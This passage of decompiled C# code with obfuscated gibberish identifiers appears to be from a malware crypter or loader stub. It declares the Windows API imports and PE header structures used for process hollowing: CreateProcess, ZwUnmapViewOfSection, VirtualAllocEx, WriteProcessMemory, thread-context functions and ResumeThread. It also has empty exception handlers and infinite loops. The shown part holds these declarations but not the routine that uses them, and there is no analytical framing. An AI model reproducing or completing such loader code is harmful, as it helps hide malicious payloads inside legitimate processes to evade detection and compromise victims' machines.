ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_pSnegMwGMfVvnPCpFkl1971118203()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
[EditorBrowsable(EditorBrowsableState.Never)]
|
|||
|
internal class H
|
|||
|
{
|
|||
|
[DebuggerNonUserCode]
|
|||
|
public H()
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern bool CreateProcess(
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string name,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string command,
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags process,
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags thread,
|
|||
|
bool inherit,
|
|||
|
uint flags,
|
|||
|
IntPtr system,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string current,
|
|||
|
[In] ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information startup,
|
|||
|
out sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information info);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern bool WriteProcessMemory(
|
|||
|
IntPtr process,
|
|||
|
IntPtr address,
|
|||
|
byte[] buffer,
|
|||
|
IntPtr size,
|
|||
|
out int written);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern int ReadProcessMemory(
|
|||
|
IntPtr process,
|
|||
|
IntPtr address,
|
|||
|
ref IntPtr buffer,
|
|||
|
IntPtr size,
|
|||
|
ref int read);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern int VirtualProtectEx(
|
|||
|
IntPtr process,
|
|||
|
IntPtr address,
|
|||
|
UIntPtr size,
|
|||
|
UIntPtr @new,
|
|||
|
[Out] uint old);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern IntPtr VirtualAllocEx(
|
|||
|
IntPtr process,
|
|||
|
IntPtr address,
|
|||
|
uint size,
|
|||
|
uint type,
|
|||
|
uint protect);
|
|||
|
|
|||
|
[DllImport("ntdll", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern long ZwUnmapViewOfSection(IntPtr process, IntPtr address);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern uint ResumeThread(IntPtr thread);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern bool GetThreadContext(
|
|||
|
IntPtr thread,
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
public static extern bool SetThreadContext(
|
|||
|
IntPtr thread,
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context);
|
|||
|
|
|||
|
public struct Context
|
|||
|
{
|
|||
|
public uint Flags;
|
|||
|
public uint D0;
|
|||
|
public uint D1;
|
|||
|
public uint D2;
|
|||
|
public uint D3;
|
|||
|
public uint D6;
|
|||
|
public uint D7;
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Save Save;
|
|||
|
public uint SG;
|
|||
|
public uint SF;
|
|||
|
public uint SE;
|
|||
|
public uint SD;
|
|||
|
public uint Edi;
|
|||
|
public uint Esi;
|
|||
|
public uint Ebx;
|
|||
|
public uint Edx;
|
|||
|
public uint Ecx;
|
|||
|
public uint Eax;
|
|||
|
public uint Ebp;
|
|||
|
public uint Eip;
|
|||
|
public uint SC;
|
|||
|
public uint EFlags;
|
|||
|
public uint Esp;
|
|||
|
public uint SS;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|||
|
public byte[] Registers;
|
|||
|
}
|
|||
|
|
|||
|
public struct Save
|
|||
|
{
|
|||
|
public uint Control;
|
|||
|
public uint Status;
|
|||
|
public uint Tag;
|
|||
|
public uint ErrorO;
|
|||
|
public uint ErrorS;
|
|||
|
public uint DataO;
|
|||
|
public uint DataS;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|||
|
public byte[] RegisterArea;
|
|||
|
public uint State;
|
|||
|
}
|
|||
|
|
|||
|
public struct Misc
|
|||
|
{
|
|||
|
public uint Address;
|
|||
|
public uint Size;
|
|||
|
}
|
|||
|
|
|||
|
public struct Section_Header
|
|||
|
{
|
|||
|
public byte Name;
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Misc Misc;
|
|||
|
public uint Address;
|
|||
|
public uint Size;
|
|||
|
public uint Pointer;
|
|||
|
public uint PRelocations;
|
|||
|
public uint PLines;
|
|||
|
public uint NRelocations;
|
|||
|
public uint NLines;
|
|||
|
public uint Flags;
|
|||
|
}
|
|||
|
|
|||
|
public struct Process_Information
|
|||
|
{
|
|||
|
public IntPtr Process;
|
|||
|
public IntPtr Thread;
|
|||
|
public int ProcessId;
|
|||
|
public int ThreadId;
|
|||
|
}
|
|||
|
|
|||
|
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|||
|
public struct Startup_Information
|
|||
|
{
|
|||
|
public int CB;
|
|||
|
public string ReservedA;
|
|||
|
public string Desktop;
|
|||
|
public string Title;
|
|||
|
public int X;
|
|||
|
public int Y;
|
|||
|
public int XSize;
|
|||
|
public int YSize;
|
|||
|
public int XCount;
|
|||
|
public int YCount;
|
|||
|
public int Fill;
|
|||
|
public int Flags;
|
|||
|
public short ShowWindow;
|
|||
|
public short ReservedB;
|
|||
|
public int ReservedC;
|
|||
|
public int Input;
|
|||
|
public int Output;
|
|||
|
public int Error;
|
|||
|
}
|
|||
|
|
|||
|
public struct Security_Flags
|
|||
|
{
|
|||
|
public int Length;
|
|||
|
public IntPtr Descriptor;
|
|||
|
public int Inherit;
|
|||
|
}
|
|||
|
|
|||
|
public struct DOS_Header
|
|||
|
{
|
|||
|
public ushort Magic;
|
|||
|
public ushort Last;
|
|||
|
public ushort Pages;
|
|||
|
public ushort Relocations;
|
|||
|
public ushort Size;
|
|||
|
public ushort Minimum;
|
|||
|
public ushort Maximum;
|
|||
|
public ushort SS;
|
|||
|
public ushort SP;
|
|||
|
public ushort Checksum;
|
|||
|
public ushort IP;
|
|||
|
public ushort CS;
|
|||
|
public ushort Table;
|
|||
|
public ushort Overlay;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|||
|
public ushort[] ReservedA;
|
|||
|
public ushort ID;
|
|||
|
public ushort Info;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|||
|
public ushort[] ReservedB;
|
|||
|
public int Address;
|
|||
|
}
|
|||
|
|
|||
|
public struct NT_Headers
|
|||
|
{
|
|||
|
public uint Signature;
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.File_Header File;
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Optional_Headers Optional;
|
|||
|
}
|
|||
|
|
|||
|
public struct File_Header
|
|||
|
{
|
|||
|
public ushort Machine;
|
|||
|
public ushort Sections;
|
|||
|
public uint Stamp;
|
|||
|
public uint Table;
|
|||
|
public uint Symbols;
|
|||
|
public ushort Size;
|
|||
|
public ushort Flags;
|
|||
|
}
|
|||
|
|
|||
|
public struct Optional_Headers
|
|||
|
{
|
|||
|
public ushort Magic;
|
|||
|
public byte Major;
|
|||
|
public byte Minor;
|
|||
|
public uint SCode;
|
|||
|
public uint IData;
|
|||
|
public uint UData;
|
|||
|
public uint Address;
|
|||
|
public uint Code;
|
|||
|
public uint Data;
|
|||
|
public uint Image;
|
|||
|
public uint SectionA;
|
|||
|
public uint FileA;
|
|||
|
public ushort MajorO;
|
|||
|
public ushort MinorO;
|
|||
|
public ushort MajorI;
|
|||
|
public ushort MinorI;
|
|||
|
public ushort MajorS;
|
|||
|
public ushort MinorS;
|
|||
|
public uint Version;
|
|||
|
public uint SImage;
|
|||
|
public uint SHeaders;
|
|||
|
public uint Checksum;
|
|||
|
public ushort Subsystem;
|
|||
|
public ushort Flags;
|
|||
|
public uint SSReserve;
|
|||
|
public uint SSCommit;
|
|||
|
public uint SHReserve;
|
|||
|
public uint SHCommit;
|
|||
|
public uint LFlags;
|
|||
|
public uint Count;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Data_Directory[] DataDirectory;
|
|||
|
}
|
|||
|
|
|||
|
public struct Data_Directory
|
|||
|
{
|
|||
|
public uint Address;
|
|||
|
public uint Size;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|